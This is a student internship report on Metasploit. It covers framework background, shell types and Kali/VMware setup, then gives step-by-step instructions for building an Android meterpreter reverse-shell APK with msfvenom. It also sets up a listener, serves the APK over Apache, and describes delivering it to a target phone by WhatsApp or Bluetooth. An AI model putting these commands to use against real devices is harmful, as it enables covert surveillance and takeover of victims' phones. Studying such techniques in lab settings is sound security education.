PRORECT REPORT ON

Exploit Development: Metasploit

RAMAIAH POLYTECHNIC Aivolved Technologies Pvt Ltd

Submitted By :
1. Adithya V
2. Amruth RB
3. Bhagavathy Raj V
4. BM Anand
5. Hemanth KS
6. Swastik Shetty
7. Vishal Kerur
Role:
As a group, our assigned the role of work was on exploiting android, devices using
Metasploit Framework with the help of Kali Linux

Project Overview:
Our job as a group of interns was to try to exploit android devices but as we were
progressing, we were also assigned the task to try to access a windows machine and a
Linux machine

Responsibilities:
 Developing and implementing Metasploit framework for accessing the target’s
device
 Working with modules like auxiliary, encoders, exploits, nops, payloads post

Goal:
The goal is to enhance understanding and proficiency in exploit development,
enabling security professionals to effectively assess them
1. Vulnerability Assessment:
 Identify and assess vulnerabilities in computer systems and networks to
understand potential points of exploitation.
2. Exploit Development:
 Develop, test, and deploy exploits for known vulnerabilities. This helps
security professionals understand the impact of vulnerabilities and assists
in creating mitigation strategies.
3. Penetration Testing:
 Conduct simulated attacks on systems and networks to evaluate their
security posture. This involves attempting to exploit vulnerabilities in a
controlled environment to identify weaknesses.
4. Education and Training:
 Serve as an educational tool for learning about penetration testing, ethical
hacking, and cybersecurity.
Abstract: Metasploit is the world’s leading open-source penetrating framework used
by security engineers as a penetration testing system and a development platform that
allows to create security tools and exploits. The framework makes hacking simple for
both attackers and defenders.

The various tools, libraries, user interfaces, and modules of Metasploit allow a user to
configure an exploit module, pair with a payload, point at a target, and launch at the
target system. Metasploit’s large and extensive database houses hundreds of exploits
and several payload options.

The project focuses on providing methods and features for automating the exploit
development using the functions and tools available in the popular Metasploit
framework. Metasploit is a powerful and widely used penetration testing tool that
identifies and exploits vulnerabilities in target systems.

Use case and Purpose: With the wide range of applications and open-source
availability that Metasploit offers, the framework is used by professionals in
development, security, and operations to hackers.

Metasploit Uses and Benefits: Metasploit provides you with varied use cases, and its
benefits include:

 Open Source and Actively Developed – Metasploit is preferred to other

highly paid penetration testing tools because it allows accessing its source
code and adding specific custom modules.

 Ease of Use – it is easy to use Metasploit while conducting a large network

penetration test. Metasploit conducts automated tests on all systems in order
to exploit the vulnerability.

 Easy Switching Between Payloads – the set payload command allows easy,
quick access to switch payloads. It becomes easy to change the meterpreter or
shell-based access into a specific operation.

 Cleaner Exits – Metasploit allows a clean exit from the target system it has
compromised.

 Friendly GUI Environment – friendly GUI and third-party interfaces

facilitate the penetrate testing project.
Metasploit Framework: Following is the filesystem of Metasploit Framework
(MSF):

 Data – contains editable files for storing binaries, wordlist, images,

templates, logos, etc

 Tools - contains command utilities including plugins, hardware, memdump

 Scripts - contains Meterpreter scripts, resources to run functionalities

 Modules - contains actual MSF modules

 Plugins - additional extensions for automating manual tasks

 Documentation - documents and pdfs concerning Metasploit framework

 Lib - contains libraries required to run Metasploit from start to end

Metasploit Shell Types

There are two types of shells in Metasploit — for attacking or interacting with the
target system.

 Bind Shell - here, the target machine opens up a listener on the victim
machine, and then the attacker connects to the listener to get a remote shell.
This type of shell is risky because anyone can connect to the shell and run the
command.

 Reverse Shell - here, the headset runs on the attacker, and the target system
is connected to the attacker using a shell. Reverse shells can solve problems
that are caused by bind shells.
Metasploit Commands

Some basic commands of Metasploit are msfconsole, banner, search, connect, cd,
back, grep, jobs, kill, load, info, show options, set, check, edit, use, exploit, exit, help,
and others.

Requirements
Metasploit is a popular open-source penetration testing framework that helps security
professionals and ethical hackers identify and exploit vulnerabilities in systems. To
effectively use Metasploit, you need to ensure that your system meets certain
specifications.

Here are the basic requirements:

 Operating System: Compatible with Linux, Windows, and macOS, but

primarily used on Linux distributions like Kali Linux.
 Hardware: Requires at least 2 GB of RAM and a dual-core processor.
 Disk Space: Recommend at least 2 GB of free space.
 Dependencies: Install necessary dependencies, including Ruby, PostgreSQL,
and other required gems.
 Network Connectivity: Internet access for updates and obtaining new exploit
modules.
 Database Configuration: Configure a database (preferably PostgreSQL) for
storing target and exploit information.
 Firewall and Antivirus: Adjust firewall settings and antivirus configurations to
allow Metasploit operations.
 Installation Steps: Follow official installation instructions for your operating
system.
 Updates: Regularly update Metasploit using the msfupdate command.
 User Permissions: May require administrative or root privileges.

Methodology
Requirements:
1. A computer or laptop with Kali Linux installed or a virtual machine like VMware
or Oracle Virtual Box if the host OS is windows
2. A stable WIFI network
3. Install Metasploit Framework if not found (it will be pre-installed in Kali Linux)
4. An android device or a windows machine

Information Gathered

Here are some data sources for collecting information regarding Metasploit:
1. Official Sources:
Metasploit Framework Documentation: The official documentation for Metasploit is a
comprehensive resource that covers everything from installation and configuration to
using the framework's various modules and features.
 Metasploit Blog: The Metasploit blog is a great way to stay up-to-date on the
latest news and developments related to the framework.
 Metasploit Community Forums: The Metasploit community forums are a
valuable resource for getting help and advice from other Metasploit users.

2. Third-Party Sources:
 Online Courses: There are a number of online courses available that teach you
how to use Metasploit. These courses can be a great way to learn the framework
at your own pace.
 Security Blogs and Websites: Many security blogs and websites publish articles
and tutorials about Metasploit.
Modules

Module 1 (Virtual Machine)

 To download and install the VMware product, visit the official website of
VMware.
 Click on Free Product Trials & Demo >> Workstation Pro. You will be
redirected to the download page.
 Once the download is complete, run the .exe to install VMware
Workstation. A popup will appear.
 Once Initialization gets completed, Click on Next.
 Accept the terms and click Next
 On the next screen, It will ask for additional features; it is not mandatory
to check this box. Click on Next.
 At this step, VMware Workstation is ready to install. Click on Install.

Module 2 (Installing Kali Linux in VMware)

 Download Kali Linux ISO: Get the ISO image from the official Kali
Linux website.
 Install VMware: Download and install VMware Workstation Player or
VMware Workstation Pro.
 Create New Virtual Machine: Use VMware to create a new virtual
machine, selecting the Kali Linux ISO file as the installation media.
 Specify Guest OS: Choose Linux and the appropriate version (e.g., Debian
64-bit).
 Name and Location: Give the virtual machine a name and choose where to
store it.
 Disk Capacity: Set the disk size for the virtual machine.
 Customize Hardware (Optional): Adjust settings like RAM, CPU cores,
etc., as needed.
 Finish Installation: Review settings and create the virtual machine.
 Start Virtual Machine: Launch the virtual machine from VMware.
 Install Kali Linux: Follow on-screen instructions to install Kali Linux
within the virtual machine.

1. Open your Virtual Machine where Kali is installed

2. Enter the User’s credentials to log into the system

3. Go ahead and open your terminal in the Kali

4. Then type “cd Desktop” for installing the apk file in the Desktop directory

5. For creating an apk with a payload type this command “msfvenom -p

android/meterpreter/reverse_tcp LHOST=192.168.0.3
LPORT=4444 -o malicious.apk” and click enter

6. You have successfully created an android apk with the necessary payload to
gain access of the target device

7. For setting up the host and target device and to set up listeners and monitor the
environment we need a medium for it. In this case we are using msfconsole.

8. Go ahead and open a new terminal

9. In that type “msfconsole”, and click enter

10.Then an interface will open for executing msf commands

11.We tell it that we'd like to use the generic payload handler, ie the “multi-
handler” module

12. We need to tell the multi-handler what IP address to listen on – this will
correspond to the LHOST value we set in our msfvenom command “set
LHOST 192.168.0.3”

13. For setting up the listener port we need to type “set LHOST 4444”

14. For checking the parameters assigned type “show options”

15. Then open a second terminal for setting up the server ,for accessing the file
through it , type this command for using apache server, “service apache2
start”, click enter

16. For check the status of the server ,type “service apache status”

17. Then change your directory to Desktop by typing “cd Desktop”

18. Type “ls” for listing the contents in the desktop.

 19. Then type “sudo cp (filename).apk /var/www/html” for coping
the created apk to copy it and paste it to the directory mentioned in the code.

For Accessing the Android device through the malicious apk

1. You can share the created apk file by various ways for accessing the target’s
phone for example, sharing the apk file via WhatsApp, or sharing it via usb
transfer, or via Bluetooth or nearby share.

2. Keep the msfconsole up and running and type “run” for accessing the phone

3. Install and accept the permissions that the application requires

4. Once accepted a meterpreter session will get generated for accessing the target
phone by various commands

Tutorial for accessing the target’s camera, microphone and file system

These are the commands required for navigating into files and folders in the
phone
Output
The problems we faced during the development